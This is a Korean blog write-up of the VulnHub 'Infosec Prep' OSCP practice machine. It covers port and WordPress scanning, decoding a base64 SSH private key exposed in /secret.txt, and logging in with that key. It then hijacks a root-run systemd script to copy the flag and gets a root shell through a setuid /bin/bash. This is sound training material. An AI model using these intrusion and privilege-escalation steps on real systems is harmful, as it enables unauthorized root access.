OSCP/Vulnahub
25. Infosec Prep
takudaddy
2021. 4. 9. 21:08
INFO
Name : Infosec Prep
Entry : 25 / 35
Level : Easy
VulnHub URL : https://www.vulnhub.com/entry/infosec-prep-oscp,508/
GOAL
As with most CTFs from VulnHub, the goal is to get the text file which serves as the flag from the /root directory.
SETUP
I’m using both VMWare Workstation and Virtual box(depending on conditions of the image) to host Kali and the MisDirection image, with both VMs running in a NAT network(sometimes Bridged). I used Workstation this time.
DESCRIPTON
This box should be easy. This machine was created for the InfoSec Prep Discord Server (https://discord.gg/RRgKaep) as a give way for a 30d voucher to the OSCP Lab, Lab materials, and an exam attempt.
The box was created with VMWare Workstation, but it should work with VMWare Player and Virtualbox. Upon booting up it should display an IP address. This is the target address based on whatever settings you have. You should verify the address just incase.
Find the flag.txt in /root/ and submit it to the TryHarder bot on Discord to enter the give away. The command is only available for so long. So if you are just joining the server or doing the box for fun, the command won't be there any longer at a later time.
Please do not publish any write ups for this box until August 7, 2020 as this is probably when the give away will end. After that, fair game!
A big thanks to Offensive Security for providing the OSCP voucher.
Box created by FalconSpy with the support of the staff at InfoSec Prep Discord Server
TABLE OF CONTENTS
1. DISCOVERY
2. SCANNING
3. WEB RECONNAISSANCE
4. EXPLOITATION
5. POST EXPLOITATION
6. PRIVILEGE ESCALATION
1. DISCOVERY
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.20.13 00:0c:29:cf:17:9a 2 120 VMware, Inc.
2. SCANNING
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.2p1 Ubuntu 4ubuntu0.1 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 3072 91:ba:0d:d4:39:05:e3:13:55:57:8f:1b:46:90:db:e4 (RSA)
| 256 0f:35:d1:a1:31:f2:f6:aa:75:e8:17:01:e7:1e:d1:d5 (ECDSA)
|_ 256 af:f1:53:ea:7b:4d:d7:fa:d8:de:0d:f2:28:fc:86:d7 (ED25519)
80/tcp open http Apache httpd 2.4.41 ((Ubuntu))
|_http-generator: WordPress 5.4.2
| http-robots.txt: 1 disallowed entry
|_/secret.txt
|_http-server-header: Apache/2.4.41 (Ubuntu)
|_http-title: OSCP Voucher – Just another WordPress site
33060/tcp open mysqlx?
| fingerprint-strings:
| TLSSessionReq, afp:
| Invalid message"
web enumeration
+ Entry '/secret.txt' in robots.txt returned a non-forbidden or redirect HTTP code (200)
+ Web Server returns a valid response with junk HTTP methods, this may cause false positives.
+ /wp-content/plugins/akismet/readme.txt: The WordPress Akismet plugin 'Tested up to' version usually matches the WordPress version
+ /wp-links-opml.php: This WordPress script reveals the installed version.
+ OSVDB-3092: /license.txt: License file found may identify site software.
+ /: A Wordpress installation was found.
+ Cookie wordpress_test_cookie created without the httponly flag
+ /wp-login.php: Wordpress login found
---- Scanning URL: http://192.168.20.13/ ----
+ http://192.168.20.13/index.php (CODE:301|SIZE:0)
+ http://192.168.20.13/license.txt (CODE:200|SIZE:19915)
+ http://192.168.20.13/readme.html (CODE:200|SIZE:7278)
+ http://192.168.20.13/robots.txt (CODE:200|SIZE:36)
+ http://192.168.20.13/secret.txt (CODE:200|SIZE:3502)
+ http://192.168.20.13/wp-blog-header.php (CODE:200|SIZE:0)
+ http://192.168.20.13/wp-config.php (CODE:200|SIZE:0)
+ http://192.168.20.13/wp-cron.php (CODE:200|SIZE:0)
+ http://192.168.20.13/wp-links-opml.php (CODE:200|SIZE:227)
+ http://192.168.20.13/wp-load.php (CODE:200|SIZE:0)
+ http://192.168.20.13/wp-login.php (CODE:200|SIZE:4812)
+ http://192.168.20.13/wp-mail.php (CODE:403|SIZE:2709)
+ http://192.168.20.13/wp-settings.php (CODE:500|SIZE:0)
+ http://192.168.20.13/wp-signup.php (CODE:302|SIZE:0)
+ http://192.168.20.13/wp-trackback.php (CODE:200|SIZE:135)
+ http://192.168.20.13/xmlrpc.php (CODE:405|SIZE:42)
wordpress
┌──(root💀takudaddy)-[~]
└─# wpscan --url http://192.168.20.13
_______________________________________________________________
__ _______ _____
\ \ / / __ \ / ____|
\ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
\ \/ \/ / | ___/ \___ \ / __|/ _` | '_ \
\ /\ / | | ____) | (__| (_| | | | |
\/ \/ |_| |_____/ \___|\__,_|_| |_|
WordPress Security Scanner by the WPScan Team
Version 3.8.14
Sponsored by Automattic - https://automattic.com/
@_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[+] URL: http://192.168.20.13/ [192.168.20.13]
[+] Started: Fri Apr 9 19:13:28 2021
Interesting Finding(s):
[+] Headers
| Interesting Entry: Server: Apache/2.4.41 (Ubuntu)
| Found By: Headers (Passive Detection)
| Confidence: 100%
[+] robots.txt found: http://192.168.20.13/robots.txt
| Found By: Robots Txt (Aggressive Detection)
| Confidence: 100%
[+] XML-RPC seems to be enabled: http://192.168.20.13/xmlrpc.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
| References:
| - http://codex.wordpress.org/XML-RPC_Pingback_API
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
| - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
| - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
[+] WordPress readme found: http://192.168.20.13/readme.html
| Found By: Direct Access (Aggressive Detection)
| Confidence: 100%
[+] The external WP-Cron seems to be enabled: http://192.168.20.13/wp-cron.php
| Found By: Direct Access (Aggressive Detection)
| Confidence: 60%
| References:
| - https://www.iplocation.net/defend-wordpress-from-ddos
| - https://github.com/wpscanteam/wpscan/issues/1299
[+] WordPress version 5.4.2 identified (Insecure, released on 2020-06-10).
| Found By: Rss Generator (Passive Detection)
| - http://192.168.20.13/index.php/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
| - http://192.168.20.13/index.php/comments/feed/, <generator>https://wordpress.org/?v=5.4.2</generator>
[+] WordPress theme in use: twentytwenty
| Location: http://192.168.20.13/wp-content/themes/twentytwenty/
| Last Updated: 2021-03-09T00:00:00.000Z
| Readme: http://192.168.20.13/wp-content/themes/twentytwenty/readme.txt
| [!] The version is out of date, the latest version is 1.7
| Style URL: http://192.168.20.13/wp-content/themes/twentytwenty/style.css?ver=1.2
| Style Name: Twenty Twenty
| Style URI: https://wordpress.org/themes/twentytwenty/
| Description: Our default theme for 2020 is designed to take full advantage of the flexibility of the block editor...
| Author: the WordPress team
| Author URI: https://wordpress.org/
|
| Found By: Css Style In Homepage (Passive Detection)
|
| Version: 1.2 (80% confidence)
| Found By: Style (Passive Detection)
| - http://192.168.20.13/wp-content/themes/twentytwenty/style.css?ver=1.2, Match: 'Version: 1.2'
[+] Enumerating All Plugins (via Passive Methods)
[i] No plugins Found.
[+] Enumerating Config Backups (via Passive and Aggressive Methods)
Checking Config Backups - Time: 00:00:00 <========================================> (22 / 22) 100.00% Time: 00:00:00
[i] No Config Backups Found.
[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 50 daily requests by registering at https://wpscan.com/register
[+] Finished: Fri Apr 9 19:13:31 2021
[+] Requests Done: 54
[+] Cached Requests: 6
[+] Data Sent: 13.316 KB
[+] Data Received: 329.199 KB
[+] Memory used: 198.105 MB
[+] Elapsed time: 00:00:03
nothing interesting
3. WEB RECONNAISSANCE
'OSCP is the only user on this box!'
/secret.txt
LS0tLS1CRUdJTiBPUEVOU1NIIFBSSVZBVEUgS0VZLS0tLS0KYjNCbGJuTnphQzFyWlhrdGRqRUFB QUFBQkc1dmJtVUFBQUFFYm05dVpRQUFBQUFBQUFBQkFBQUJsd0FBQUFkemMyZ3RjbgpOaEFBQUFB d0VBQVFBQUFZRUF0SENzU3pIdFVGOEs4dGlPcUVDUVlMcktLckNSc2J2cTZpSUc3UjlnMFdQdjl3 K2drVVdlCkl6QlNjdmdsTEU5ZmxvbHNLZHhmTVFRYk1WR3FTQURuWUJUYXZhaWdRZWt1ZTBiTHNZ ay9yWjVGaE9VUlpMVHZkbEpXeHoKYklleUM1YTVGMERsOVVZbXpDaGU0M3owRG8waVF3MTc4R0pV UWFxc2NMbUVhdHFJaVQvMkZrRitBdmVXM2hxUGZicnc5dgpBOVFBSVVBM2xlZHFyOFhFelkvL0xx MCtzUWcvcFV1MEtQa1kxOGk2dm5maVlIR2t5VzFTZ3J5UGg1eDlCR1RrM2VSWWNOCnc2bURiQWpY S0tDSEdNK2RubkdOZ3ZBa3FUK2daV3ovTXB5MGVrYXVrNk5QN05Dek9STnJJWEFZRmExcld6YUV0 eXBId1kKa0NFY2ZXSkpsWjcrZmNFRmE1QjdnRXd0L2FLZEZSWFBRd2luRmxpUU1ZTW1hdThQWmJQ aUJJcnh0SVlYeTNNSGNLQklzSgowSFNLditIYktXOWtwVEw1T29Ba0I4ZkhGMzB1alZPYjZZVHVj MXNKS1dSSElaWTNxZTA4STJSWGVFeEZGWXU5b0x1ZzBkCnRIWWRKSEZMN2NXaU52NG1SeUo5UmNy aFZMMVYzQ2F6TlpLS3dyYVJBQUFGZ0g5SlFMMS9TVUM5QUFBQUIzTnphQzF5YzIKRUFBQUdCQUxS d3JFc3g3VkJmQ3ZMWWpxaEFrR0M2eWlxd2tiRzc2dW9pQnUwZllORmo3L2NQb0pGRm5pTXdVbkw0 SlN4UApYNWFKYkNuY1h6RUVHekZScWtnQTUyQVUycjJvb0VIcExudEd5N0dKUDYyZVJZVGxFV1Mw NzNaU1ZzYzJ5SHNndVd1UmRBCjVmVkdKc3dvWHVOODlBNk5Ja01OZS9CaVZFR3FySEM1aEdyYWlJ ay85aFpCZmdMM2x0NGFqMzI2OFBid1BVQUNGQU41WG4KYXEvRnhNMlAveTZ0UHJFSVA2Vkx0Q2o1 R05mSXVyNTM0bUJ4cE1sdFVvSzhqNGVjZlFSazVOM2tXSERjT3BnMndJMXlpZwpoeGpQblo1eGpZ THdKS2svb0dWcy96S2N0SHBHcnBPalQrelFzemtUYXlGd0dCV3RhMXMyaExjcVI4R0pBaEhIMWlT WldlCi9uM0JCV3VRZTRCTUxmMmluUlVWejBNSXB4WllrREdESm1ydkQyV3o0Z1NLOGJTR0Y4dHpC M0NnU0xDZEIwaXIvaDJ5bHYKWktVeStUcUFKQWZIeHhkOUxvMVRtK21FN25OYkNTbGtSeUdXTjZu dFBDTmtWM2hNUlJXTHZhQzdvTkhiUjJIU1J4UyszRgpvamIrSmtjaWZVWEs0VlM5VmR3bXN6V1Np c0sya1FBQUFBTUJBQUVBQUFHQkFMQ3l6ZVp0SkFwYXFHd2I2Y2VXUWt5WFhyCmJqWmlsNDdwa05i VjcwSldtbnhpeFkzMUtqckRLbGRYZ2t6TEpSb0RmWXAxVnUrc0VUVmxXN3RWY0JtNU1abVFPMWlB cEQKZ1VNemx2RnFpRE5MRktVSmRUajdmcXlPQVhEZ2t2OFFrc05tRXhLb0JBakduTTl1OHJSQXlq NVBObzF3QVdLcENMeElZMwpCaGRsbmVOYUFYRFYvY0tHRnZXMWFPTWxHQ2VhSjBEeFNBd0c1Snlz NEtpNmtKNUVrZldvOGVsc1VXRjMwd1FrVzl5aklQClVGNUZxNnVkSlBubUVXQXB2THQ2MkllVHZG cWcrdFB0R25WUGxlTzNsdm5DQkJJeGY4dkJrOFd0b0pWSmRKdDNoTzhjNGoKa010WHN2TGdSbHZl MWJaVVpYNU15bUhhbE4vTEExSXNvQzRZa2cvcE1nM3M5Y1lSUmttK0d4aVVVNWJ2OWV6d000Qm1r bwpRUHZ5VWN5ZTI4endrTzZ0Z1ZNWng0b3NySW9OOVd0RFVVZGJkbUQyVUJaMm4zQ1pNa09WOVhK eGVqdTUxa0gxZnM4cTM5ClFYZnhkTmhCYjNZcjJSakNGVUxEeGh3RFNJSHpHN2dmSkVEYVdZY09r TmtJYUhIZ2FWN2t4enlwWWNxTHJzMFM3QzRRQUEKQU1FQWhkbUQ3UXU1dHJ0QkYzbWdmY2RxcFpP cTYrdFc2aGttUjBoWk5YNVo2Zm5lZFV4Ly9RWTVzd0tBRXZnTkNLSzhTbQppRlhsWWZnSDZLLzVV blpuZ0Viak1RTVRkT09sa2JyZ3BNWWloK1pneXZLMUxvT1R5TXZWZ1Q1TE1nakpHc2FRNTM5M00y CnlVRWlTWGVyN3E5ME42VkhZWERKaFVXWDJWM1FNY0NxcHRTQ1MxYlNxdmttTnZoUVhNQWFBUzhB SncxOXFYV1hpbTE1U3AKV29xZGpvU1dFSnhLZUZUd1VXN1dPaVlDMkZ2NWRzM2NZT1I4Um9yYm1H bnpkaVpneFpBQUFBd1FEaE5YS21TMG9WTWREeQozZktaZ1R1d3I4TXk1SHlsNWpyYTZvd2ovNXJK TVVYNnNqWkVpZ1phOTZFamNldlpKeUdURjJ1Vjc3QVEyUnF3bmJiMkdsCmpkTGtjMFl0OXVicVNp a2Q1ZjhBa1psWkJzQ0lydnVEUVpDb3haQkd1RDJEVVd6T2dLTWxmeHZGQk5RRitMV0ZndGJyU1AK T2dCNGloZFBDMSs2RmRTalFKNzdmMWJOR0htbjBhbW9pdUpqbFVPT1BMMWNJUHp0MGh6RVJMajJx djlEVWVsVE9VcmFuTwpjVVdyUGdyelZHVCtRdmtrakdKRlgrcjh0R1dDQU9RUlVBQUFEQkFNMGNS aERvd09GeDUwSGtFK0hNSUoyalFJZWZ2d3BtCkJuMkZONmt3NEdMWmlWY3FVVDZhWTY4bmpMaWh0 RHBlZVN6b3BTanlLaDEwYk53UlMwREFJTHNjV2c2eGMvUjh5dWVBZUkKUmN3ODV1ZGtoTlZXcGVy ZzRPc2lGWk1wd0txY01sdDhpNmxWbW9VQmpSdEJENGc1TVlXUkFOTzBOajlWV01UYlc5UkxpUgpr dW9SaVNoaDZ1Q2pHQ0NIL1dmd0NvZjllbkNlajRIRWo1RVBqOG5aMGNNTnZvQVJxN1ZuQ05HVFBh bWNYQnJmSXd4Y1ZUCjhuZksyb0RjNkxmckRtalFBQUFBbHZjMk53UUc5elkzQT0KLS0tLS1FTkQg T1BFTlNTSCBQUklWQVRFIEtFWS0tLS0tCg==
┌──(root💀takudaddy)-[/study]
└─# cat key.pub | base64 -d 2 ⚙
-----BEGIN OPENSSH PRIVATE KEY-----
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
8nfK2oDc6LfrDmjQAAAAlvc2NwQG9zY3A=
-----END OPENSSH PRIVATE KEY-----
┌──(root💀takudaddy)-[/study]
└─# cat key.pub | base64 -d > id_rsa
4. EXPLOITATION
┌──(root💀takudaddy)-[/study]
└─# ssh -i id_rsa oscp@192.168.20.13 255 ⨯ 2 ⚙
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
@ WARNING: UNPROTECTED PRIVATE KEY FILE! @
@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@
Permissions 0644 for 'id_rsa' are too open.
It is required that your private key files are NOT accessible by others.
This private key will be ignored.
Load key "id_rsa": bad permissions
oscp@192.168.20.13: Permission denied (publickey).
┌──(root💀takudaddy)-[/study]
└─# chmod 600 id_rsa 255 ⨯ 2 ⚙
┌──(root💀takudaddy)-[/study]
└─# ssh -i id_rsa oscp@192.168.20.13 2 ⚙
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 09 Apr 2021 07:58:20 PM UTC
System load: 0.04 Processes: 211
Usage of /: 25.5% of 19.56GB Users logged in: 0
Memory usage: 70% IPv4 address for eth0: 192.168.20.13
Swap usage: 0%
0 updates can be installed immediately.
0 of these updates are security updates.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Last login: Sat Jul 11 16:50:11 2020 from 192.168.128.1
-bash-5.0$ id
uid=1000(oscp) gid=1000(oscp) groups=1000(oscp),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),116(lxd)
-bash-5.0$ ls -al
total 36
drwxr-xr-x 4 oscp oscp 4096 Jul 11 2020 .
drwxr-xr-x 3 root root 4096 Jul 9 2020 ..
-rw------- 1 oscp oscp 5 Apr 9 19:58 .bash_history
-rw-r--r-- 1 oscp oscp 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 oscp oscp 3771 Feb 25 2020 .bashrc
drwx------ 2 oscp oscp 4096 Jul 9 2020 .cache
-rwxr-xr-x 1 root root 88 Jul 9 2020 ip
-rw-r--r-- 1 oscp oscp 807 Feb 25 2020 .profile
drwxrwxr-x 2 oscp oscp 4096 Jul 9 2020 .ssh
-rw-r--r-- 1 oscp oscp 0 Jul 9 2020 .sudo_as_admin_successful
-bash-5.0$ cat ip
#!/bin/sh
cp /etc/issue-standard /etc/issue
/usr/local/bin/get-ip-address >> /etc/issue
ip 라는 스크립트가 루트 권한으로 돌아간다.
확인해보면
-bash-5.0$ grep -r "/home/oscp/ip" /etc 2>/dev/null
/etc/systemd/system/ip-update.service:ExecStart=/home/oscp/ip
-bash-5.0$ cat /etc/systemd/system/ip-update.service
[Unit]
Description=Write current ip addr to /etc/issue
[Service]
Type=oneshot
RemainAfterExit=true
ExecStart=/home/oscp/ip
[Install]
WantedBy=multi-user.target
이점을 이용해
ip라는 파일 내용을 고친다.
root아래 flag를 oscp 사용자 홈 폴더로 복사,
해당 파일을 oscp 유저 권한으로 변경.
-bash-5.0$ cp ip ip.orig
-bash-5.0$ ls -l
total 8
-rwxr-xr-x 1 oscp oscp 90 Apr 9 20:22 ip
-rwxr-xr-x 1 oscp oscp 90 Apr 9 20:45 ip.orig
-bash-5.0$ vi ip
-bash-5.0$ cat ip.orig
#!/bin/sh
cp /etc/issue-standard /etc/issue
/usr/local/bin/get-ip-address >> /etc/issue
-bash-5.0$ cat ip
#!/bin/sh
cp /root/flag.txt /home/oscp/flag.txt
chown oscp:oscp /home/oscp/flag.txt
서버를 리부팅 후
접속해 보면
┌──(root💀takudaddy)-[/study]
└─# ssh -i id_rsa oscp@192.168.20.13 255 ⨯ 2 ⚙
Welcome to Ubuntu 20.04 LTS (GNU/Linux 5.4.0-40-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri 09 Apr 2021 09:01:38 PM UTC
System load: 0.2 Processes: 240
Usage of /: 25.6% of 19.56GB Users logged in: 0
Memory usage: 64% IPv4 address for eth0: 192.168.20.13
Swap usage: 0%
0 updates can be installed immediately.
0 of these updates are security updates.
The list of available updates is more than a week old.
To check for new updates run: sudo apt update
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Apr 9 19:58:21 2021 from 192.168.20.1
-bash-5.0$ ls
flag.txt ip ip.orig
-bash-5.0$ ls -al
total 48
drwxr-xr-x 4 oscp oscp 4096 Apr 9 21:00 .
drwxr-xr-x 3 root root 4096 Jul 9 2020 ..
-rw------- 1 oscp oscp 2236 Apr 9 21:00 .bash_history
-rw-r--r-- 1 oscp oscp 220 Feb 25 2020 .bash_logout
-rw-r--r-- 1 oscp oscp 3771 Feb 25 2020 .bashrc
drwx------ 2 oscp oscp 4096 Jul 9 2020 .cache
-rw-r--r-- 1 oscp oscp 33 Apr 9 21:00 flag.txt
-rwxr-xr-x 1 oscp oscp 85 Apr 9 20:56 ip
-rwxr-xr-x 1 oscp oscp 90 Apr 9 20:45 ip.orig
-rw-r--r-- 1 oscp oscp 807 Feb 25 2020 .profile
drwxrwxr-x 2 oscp oscp 4096 Jul 9 2020 .ssh
-rw-r--r-- 1 oscp oscp 0 Jul 9 2020 .sudo_as_admin_successful
-rw------- 1 oscp oscp 1559 Apr 9 20:56 .viminfo
-bash-5.0$ cat flag.txt
d73b04b0e696b0945283defa3eee4538
성공!
5. PRIVILEGE ESCALATION
위 과정은 깃발은 얻었지만
권한 상승은 못 한 상황
권한 상승을 해보자.
-bash-5.0$ find / -perm -g=s -type f -exec ls -l {} \; 2>/dev/null
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /snap/core18/1705/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /snap/core18/1705/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /snap/core18/1705/usr/bin/chage
-rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /snap/core18/1705/usr/bin/expiry
-rwxr-sr-x 1 root crontab 362640 Mar 4 2019 /snap/core18/1705/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 30800 Jan 8 2020 /snap/core18/1705/usr/bin/wall
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /snap/core18/1754/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 34816 Feb 27 2019 /snap/core18/1754/sbin/unix_chkpwd
-rwxr-sr-x 1 root shadow 71816 Mar 22 2019 /snap/core18/1754/usr/bin/chage
-rwxr-sr-x 1 root shadow 22808 Mar 22 2019 /snap/core18/1754/usr/bin/expiry
-rwxr-sr-x 1 root crontab 362640 Mar 4 2019 /snap/core18/1754/usr/bin/ssh-agent
-rwxr-sr-x 1 root tty 30800 Mar 5 2020 /snap/core18/1754/usr/bin/wall
-rwxr-sr-x 1 root utmp 14648 Sep 30 2019 /usr/lib/x86_64-linux-gnu/utempter/utempter
-rwxr-sr-x 1 root crontab 43720 Feb 13 2020 /usr/bin/crontab
-rwxr-sr-x 1 root tty 35048 Apr 2 2020 /usr/bin/wall
-rwxr-sr-x 1 root shadow 84512 May 28 2020 /usr/bin/chage
-rwxr-sr-x 1 root ssh 350504 May 29 2020 /usr/bin/ssh-agent
-rwxr-sr-x 1 root mlocate 47344 Jul 16 2019 /usr/bin/mlocate
-rwsr-sr-x 1 daemon daemon 55560 Nov 12 2018 /usr/bin/at
-rwxr-sr-x 1 root shadow 31312 May 28 2020 /usr/bin/expiry
-rwsr-sr-x 1 root root 1183448 Feb 25 2020 /usr/bin/bash
-rwxr-sr-x 1 root tty 14488 Mar 30 2020 /usr/bin/bsd-write
-rwxr-sr-x 1 root shadow 43168 Dec 17 2019 /usr/sbin/pam_extrausers_chkpwd
-rwxr-sr-x 1 root shadow 43160 Dec 17 2019 /usr/sbin/unix_chkpwd
/bin/bash에 setuid 걸려있음
-bash-5.0$ /bin/bash -p
bash-5.0# cd /root
bash-5.0# ls
fix-wordpress flag.txt snap
bash-5.0# cat flag.txt
d73b04b0e696b0945283defa3eee4538
끝
728x90